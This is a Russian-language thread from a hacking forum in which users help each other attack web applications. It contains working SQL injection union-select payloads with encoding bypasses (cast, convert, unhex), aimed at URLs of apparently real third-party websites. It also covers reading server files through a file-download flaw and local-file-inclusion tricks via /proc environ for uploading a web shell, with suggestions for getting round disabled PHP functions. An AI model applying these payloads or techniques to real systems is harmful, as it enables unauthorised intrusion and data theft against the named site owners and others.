ANTICHAT — форум по информационной безопасности, OSINT и технологиям

Как провести инклуд если в скрипте только такой код

А Include нету О_о (((((

Эээээх

Не умничай Перепробовал все что возможно, CONVERT(Version(),binary) и т.д. всеравно ошибка, когда в запросе присутствуют скобки...

Вот короче эта скуля - http://www.bikeland.ru/rus/catalog/?action=assortment&id=-95+union+select+1+--+

а причем тут кодировка я не понял? скобки и кодировка?никто не умничает...просто ты думай перед тем как бред и чушь всякую постить



для тех кто в танке

''Вопрос №2 Вот так выводит , а вот так невыводит.

site.com/index.php?id=1+union+select+1,2,3,4/*------------выводит

site.com/index.php?id=1+union+select+1,version(),3,4/*----невыводит

Господа, вывод у скули либо есть, либо нет, и если вы видите вывод цифры, но не видите версию или значние из столбца, то варианта 2 либо кодировка, либо тип данных не соответствует

Кодировка:

Может сопровождаться ошибкой такого плана:

Код:

Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) Illegal mix of collations (cp1251_general_ci,IMPLICIT) and (latin1_bin,IMPLICIT)

Бороться с этим можно несколькими способами, но все они сводятся к одному и тому-же. Что-бы получить данные в нужной нам кодировке можно пользоваться либо функциями приведения типов:

cast(Version()+as+binary)

CONVERT(Version(),binary)

convert(version()+using+latin1)

convert(version()+using+binary)

Либо шифровать/дешифровать данные. Результат при этом возвращается уже в "правильной" кодировке

aes_decrypt(aes_encrypt(Version(),1),1)

unhex(hex(version()))

пример, можете поэксперементировать с разными функциями:

http://www.oceanworld.com.au/page.asp?id=-8+union+select+1,cast(version()+as+binary),3,4,5,6 ,7,8,9,10,11,12,13,14+from+information_schema.tabl es--

Несоответствие типа данных вам может встретится на БД отличных от MySql. MySql относится к типам данных достаточно лояльно, а вот другие БД в основном несоответствия не терпят. Если ваша база оказалась именно такой нужно ознакомится со статьями по проведению инъекций в Вашей базе. '' by Jokester

теперь еще раз повторюсь..причем вообще скобки с кодировкой?

можеш; попробовать в жопе пальцем ковырнутся что бы золото добыть, если ничего не получится это не значит что из за того что палец кривой...чуешь?

Есть сайт, крутится на apache2 tomcat

Есть уязвимость, заключается в скачивании любых файлов сервака, типа:

Стоит на серваке Jboss, но какая база не ясно, файл etc/mysql/my.cnf прочитал, вот его содержимое:

логи не ведутся.

Вопрос, куда можно покопать и узнать какой может быть движок базы и как можно узнать есть ли что-то в mysql?

немогу проинклудить useragent

system() и passthru() has been disabled for security reasons in /proc/19925/environ

Как можно обойти это и залить шелл

eval(), copy(), любые другие функции заюзай.

Да я все функции перебрал eval(), copy(), system(), passthru(), exec(), может есть скрипт который обходит это дело?

Что, не работают эти функции? Тогда сложновато будет с заливкой шелльца, а даже если зальешь, то все равно трудно будет в управлении - права то обрезаны по самое не балуйся.